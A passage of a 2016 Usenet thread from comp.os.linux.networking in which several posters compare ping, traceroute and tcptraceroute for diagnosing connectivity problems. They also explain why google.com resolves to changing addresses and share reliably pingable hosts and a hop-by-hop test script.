path responding with a "you didn't throw the ball far enough" message.
This will allow you to discover where out on the Internet the connection
is failing.  See the man page for "traceroute" for examples and a better
explanation.  Still another tool is tracepath, though I find it is more
dependent on the external systems "following the rules".

Ping will "fail" if the destination host is down, or doesn't want to
respond.  Traceroute is less dependent on the destination, but some
relay points along the route may drop the error message (ICMP type 11
code 0 - "time-to-live equals 0 during transit") that traceroute uses
to identify the intermediate hops.   The programs are similar, but
complimentary - one may work while the other may not.  I prefer the
"tcptraceroute" program (equivalent to "traceroute -T" in a Debian based
distro) because it has a slightly better chance of working than basic
"traceroute".

        Old guy
0
Moe
9/8/2016 7:34:14 PM
On 2016-09-08 21:34, Moe Trin wrote:
> A problem is finding a host out on the Internet that will respond (ping
> has been abused so much that many Internet hosts disable the responder).
> Lessee, www.ibiblio.org is a host in the Eastern USA, and it has an IP
> address of 152.19.134.40.  I choose it because from experience I know it
> will _usually_ respond to pings.

I use google.com. They can afford many pings, they don't care :-)

-- 
Cheers,
       Carlos E.R.
0
Carlos
9/9/2016 1:56:06 AM
On Fri, 9 Sep 2016, in the Usenet newsgroup comp.os.linux.networking, in article
<meh9ad-arv.ln1@minas-tirith.valinor>, Carlos E. R. wrote:

>Moe Trin wrote:

>> A problem is finding a host out on the Internet that will respond
>> (ping has been abused so much that many Internet hosts disable the
>> responder).  Lessee, www.ibiblio.org is a host in the Eastern USA,
>> and it has an IP address of 152.19.134.40.  I choose it because from
>> experience I know it will _usually_ respond to pings.

>I use google.com. They can afford many pings, they don't care :-)

That's because "google.com" isn't a single host.  It's many individual
hosts for load sharing.  If you ask a DNS server for the IP address of
google.com, you'll get an answer with short TTL, and the answer will
vary from DNS server to DNS server and (often) from response to
response.  I asked a dozen different DNS servers that respond to
non-customer queries using "host -a google.com $IP.ADDR.OF.DNS", and the
answers were:

[ingenio ~]$ grep -w A google.com.IPs
google.com.           285     IN      A       216.58.199.14
google.com.           283     IN      A       216.58.199.14
google.com.           258     IN      A       216.58.203.14
google.com.           158     IN      A       216.58.199.110
google.com.           276     IN      A       216.58.199.14
google.com.           251     IN      A       216.58.203.14
google.com.           299     IN      A       216.58.218.174
google.com.           299     IN      A       216.58.218.174
google.com.           293     IN      A       216.58.217.206
google.com.           72      IN      A       216.58.217.206
google.com.           21      IN      A       216.58.199.110
google.com.           71      IN      A       216.58.217.206
[ingenio ~]$

If you prefer IPv6 instead, the DNS servers gave me six different IPv6
addresses (interestingly, 3 in .au and 3 in .us, even though I'm in the
US and using US based nameservers).   The reason for the variety of
answers is because that is what the Google authoritative name servers
are telling everyone who asks.  If you were running your own recursive
DNS server, or if you asked one of the authoritative name servers (such
as ns1.google.com.) directly, you probably will get a different answer -
I just did, and got

google.com.           300     IN      A       216.58.194.78

The A and AAAA record TTLs are 300 (seconds), and even the MX (mail
exchange) servers are only 600 (seconds).  This "low" TTL allows rapid
switching of hostname <-> IP address values.  Google (and other
high-bandwidth providers such as Akamai) try to give you the IP of the
"fastest" (closest by hop-count, or least loaded) server at any given
moment.  As you are in Europe, you will likely see a different range of
addresses from what I see in the US or the O/P sees in Southeast Asia.

Thus, you may attempt to ping an IP (such as 216.58.199.14) and get no
response - because that particular host is on coffee break at the moment
and the hostname 'google.com' doesn't (AT THIS MOMENT) resolve to that
IP because of that fact.   What can I say?   ;-)

        Old guy
0
Moe
9/9/2016 8:55:37 PM
On 2016-09-09 22:55, Moe Trin wrote:

>> I use google.com. They can afford many pings, they don't care :-)
> 
> That's because "google.com" isn't a single host.  It's many individual
> hosts for load sharing.  

Yes, I know, but that doesn't matter (for the current issue) :-)

The main thing is that they respond to ping, they leave it open.


> Thus, you may attempt to ping an IP (such as 216.58.199.14) and get no
> response - because that particular host is on coffee break at the moment
> and the hostname 'google.com' doesn't (AT THIS MOMENT) resolve to that
> IP because of that fact.   What can I say?   ;-)

I just typically do "ping google.es". If it fails, chances are it is me,
not google.

-- 
Cheers,
       Carlos E.R.
0
Carlos
9/10/2016 12:47:20 AM
On Sat, 10 Sep 2016 02:47:20 +0200, Carlos E. R. wrote:

> I just typically do "ping google.es".

I ping yahoo.com one time for my "Internet" connectivity test.

> If it fails, chances are it is me, not google.

If you were to draw a picture of you internet connections with ip
address at each nic connection, you might figure out you can write a
script to ping each point along the way to see where the connection
breaks down. You can look around in the modem for some IP addresses
and use traceroute for your nodes ISP gateway.

Depending on your setup and what you test, the testing results could
look something like the following:

$ network_ck
1 Testing that ping "127.0.0.1" and networking is working on wb 
2 Testing that wb resolver reads /etc/hosts by "localhost" 
3 Testing wb nic (enp3s0) access by ip address "192.168.13.122"
4 Testing that wb resolver reads /etc/hosts by "wb.home.test"
5 Testing that wb resolver reads /etc/hosts by "wb"
6 Testing that your ISP router's ethernet "192.168.13.1" nic is alive
7 Testing that ISP modem talks to ONT's fiber nic "71.172.145.40"
8 Testing that ONT fiber nic talks to ISP gateway "71.172.145.1"
9 Testing if DNS nameserver "127.0.0.1" is alive
10 Testing that ISP can route to "98.139.183.24" (yahoo.com) 
11 Testing ISP can get a DNS result to "yahoo.com"
12 Testing that /etc/resolv.conf nameserver "127.0.0.1" is alive
13 Testing that /etc/resolv.conf nameserver "8.8.8.8" is alive
 
Basic network connectivity is working to yahoo.com
0
Bit
9/10/2016 8:27:09 AM
On Sat, 10 Sep 2016, in the Usenet newsgroup comp.os.linux.networking, in
article <slrnnt7guv.rk3.BitTwister@wb.home.test>, Bit Twister wrote:

>Carlos E. R. wrote:

>> I just typically do "ping google.es".

>I ping yahoo.com one time for my "Internet" connectivity test.

"one time" makes you a good network neighbor. (Many people don't bother
to read the man-page and are unaware of the ping count option.)  There
are other hosts out on the Internet that will usually respond, such as:

   8.8.4.4          google-public-dns-b.google.com
   8.8.8.8          google-public-dns-a.google.com
   129.82.138.44    pinger6.netsec.colostate.edu.
   152.19.134.40    www.ibiblio.org
   195.251.255.69   zff45.unnamed.aueb.gr
   203.178.148.19   pinger-j2.ant.isi.edu.
   206.117.25.90    pinger-w4.ant.isi.edu.
   varies           google.com (a.k.a www.google.com)
   varies           yahoo.com

>If you were to draw a picture of you internet connections with ip
>address at each nic connection, you might figure out you can write a
>script to ping each point along the way to see where the connection
>breaks down. You can look around in the modem for some IP addresses
>and use traceroute for your nodes ISP gateway.

In my case, the Ethernet switch is on top of a file-cabinet where I can
see the lights blink when the LAN is in use.  'ping' (ICMP Echo) may
not work well - on Linux, see

[dawn ~]$ whatis ICMP
ICMP (7)             - Linux IPv4 ICMP kernel module.
[dawn ~]$ cat /proc/sys/net/ipv4/icmp_echo_ignore_all
1
[dawn ~]$

Mentioned, many systems on the Internet are set to ignore pings, and
some [selectively] filter ICMP at the perimeter firewall.  Other systems
may ignore/drop unexpected UDP packets, and that can break traceroute.
(UDP source addresses can be forged, and this is often used in Denial-
Of-Service attacks - see RFC2827 and RFC3704).  This is why I prefer
"tcptraceroute" (or "traceroute -T" in some distros).   For me, one or
two tcptraceroutes to systems (such as those ping-ables mentioned above)
will nearly always provide enough clues to explain why things aren't
working.

A good reason for knowing how to make simple tests is that the resulting
information can HELP the ISP.  A thousand customers calling to say "The
Internet is down" is less useful than one who calls to say "the next-hop
router from 203.0.113.X to Genuity Net is not reachable" (but that
assumes a familiarity when the routes used by your ISP) or "the DNS
server on 198.51.100.56 is very slow".   (Of course, some staff on the
hell-desk can't even _spell_ DNS, much less know what it is, and they
usually won't listen to you until you tell that that you have rebooted
your computer, and the router, and the refrigerator, and...)

        Old guy
0
Moe
9/10/2016 10:53:56 PM
Reply: